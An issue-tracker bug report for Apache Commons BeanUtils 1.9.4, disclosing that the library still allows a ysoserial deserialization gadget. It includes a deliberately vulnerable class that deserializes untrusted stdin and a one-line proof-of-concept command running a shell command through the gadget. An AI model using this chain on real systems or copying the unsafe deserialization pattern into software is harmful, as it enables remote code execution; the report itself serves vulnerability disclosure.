Uploaded image for project: 'Commons BeanUtils'
  1. Commons BeanUtils
  2. BEANUTILS-556

Commons Beanutils 1.9.4 allows to build a deserialization gadget

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Open
    • Critical
    • Resolution: Unresolved
    • 1.9.4
    • None
    • Bean / Property Utils

    Description

      commons-beanutils 1.9.4 allows to build a simple deserialization gadget. For many years already, it is part of the famous ysoserial gadget collection https://github.com/frohoff/ysoserial.

      ysoserial references version 1.9.2, but it is very simple to verify everything works just fine with version 1.9.4 as well:

      main class:

      import java.io.*
      public class Main {
          public static void main (String [] args) {
              ObjectInputStream in = new ObjectInputStream (System.in);
              in.readObject ();
      {{    }}}
      }

      and then

      java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/whatever" | java -cp .:commons-beanutils-1.9.4.jar:commons-collections-3.2.2.jar:commons-logging-1.2.jar Main

       

       

      Attachments

        Activity

          People

            Unassigned Unassigned
            supersache Kai Ullrich
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated: